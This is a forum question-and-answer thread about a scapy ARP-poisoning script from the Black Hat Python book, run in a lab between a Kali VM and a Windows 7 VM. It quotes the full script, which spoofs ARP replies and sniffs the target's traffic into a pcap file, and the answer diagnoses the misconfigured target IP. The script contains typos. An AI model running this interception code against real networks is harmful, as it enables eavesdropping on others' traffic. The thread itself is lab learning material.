ARP Poisoning with scapy: Failure to get target MAC

Question

In the fourth chapter of Justin Seitz Black Hat Python book, the section detailing ARP poisoning using scapy. I'm having issues obtaining the mac address of the target ip of the target machine. I'm using a Kali VM as the attacking machine and a Win 7 VM as the target machine.

from scapy.all import *
import os
import sys
import threading
import signal

interface = "eth0"
target_ip = "10.0.2.15"
gateway_ip = "10.0.2.2"
packet_count = 1000


def restore_target(gateway_ip, gateway_mac, target_ip, target_mac):

    print "[*} Restoring target..."
    send(ARP(op=2, psrc=gateway_ip, pdst=target_ip,
             hwdst="ff:ff:ff:ff:ff:ff", hwsrc=gateway_mac), count=5)
    send(Arp(op=2, psrc=target_ip, pdst=gateway_ip,
             hwdst="ff:ff:ff:ff:ff:ff", hwsrc=target_mac), count=5)

    os.kill(os.getpid(), signal.SIGINT)


def get_mac(ip_address):
    responses, unanswered = srp(
        Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ip_address), timeout=2, retry=10)

    for s, r in responses:
        return r[Ether].src

        return None


def poison_target(gateway_ip, gateway_mac, target_ip, target_mac):

    poison_target = ARP()
    poison_target.op = 2
    poison_target.psrc = gateway_ip
    poison_target.pdst = target_ip
    posion_target.hwdst = target_mac

    poison_gateway = ARP()
    poison_gateway.op = 2
    poison_gateway.psrc = target_ip
    poison_gateway.pdst = gateway_ip
    poison_gateway.hwdst = gateway_mac

    print "[*] Beginning the ARP poison. [CTRL-C to stop]"

    while True:
        try:
            send(poison_target)
            send(poison_gateway)

            time.sleep(2)
        except KeyboardInterrupt:
            restore_target(gateway_ip, gateway_mac, target_ip, target_mac)

    print "[*] ARP poison attack finished."
    return


conf.iface = interface
conf.iface = interface

conf.verb = 0

print "[*] Setting up %s" % interface

gateway_mac = get_mac(gateway_ip)

if gateway_mac is None:
    print "[!!!] Failed to get gateway MAC. Exiting."
    sys.exit(0)
else:
    print "[*] Gateway %s is at %s" % (gateway_ip, gateway_mac)

target_mac = get_mac(target_ip)

if target_mac is None:
    print "[!!!] Failed to get target MAC. Exiting."
    sys.exit(0)
else:
    print "[*] Target %s is at %s" % (target_ip, target_mac)

poison_thread = threading.Thread(target=posion_target, args=(
    gateway_ip, gateway_mac, target_ip, target_mac))
poison_thread.start()

try:
    print "[*] Starting sniffer for %d packets" % packet_count

    bpf_filter = "ip host %s" % target_ip
    packets = sniff(count=packet_count, filter=bpf_filter, iface=interface)
    wrpcap('arper.pcap', packets)

    restore_target(gateway_ip, gateway_mac, target_ip, target_mac)

except KeyboardInterrupt:
    restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
    sys.exit(0)

The attacking machine:

root@kali:~/Documents# ifconfig
    eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
    inet 10.0.2.15  netmask 255.255.255.0  broadcast 10.0.2.255
    inet6 fe80::a00:27ff:fe81:b1df  prefixlen 64  scopeid 0x20<link>
    ether 08:00:27:81:b1:df  txqueuelen 1000  (Ethernet)
    RX packets 101529  bytes 101906744 (97.1 MiB)
    RX errors 0  dropped 0  overruns 0  frame 0
    TX packets 34775  bytes 3530239 (3.3 MiB)
    TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

    lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
    inet 127.0.0.1  netmask 255.0.0.0
    inet6 ::1  prefixlen 128  scopeid 0x10<host>
    loop  txqueuelen 1000  (Local Loopback)
    RX packets 218  bytes 13972 (13.6 KiB)
    RX errors 0  dropped 0  overruns 0  frame 0
    TX packets 218  bytes 13972 (13.6 KiB)
    TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

The output:

root@kali:~/Documents# sudo python arper.py
[*] Setting up eth0
[*] Gateway 10.0.2.2 is at 52:54:00:12:35:02
[!!!] Failed to get target MAC. Exiting.

Answer 1

you use the IP of kali ( attacking machine ) as target_ip ( 10.0.2.15 ). Win runs on the same computer, however in a virtual machine and normally a virtual machine has its own IPs ( https://www.quora.com/Do-virtual-machines-have-their-own-IP )

it is even not certain if Win on the VM is on the same network automatically. to assign static IPs for the VM and kali in the same /24 network ( i.e. 10.0.2.x/24 - replace the x ) see https://serverfault.com/questions/839443/giving-the-vm-an-own-ip-address

coder is right : first check if network connectivity is established by pinging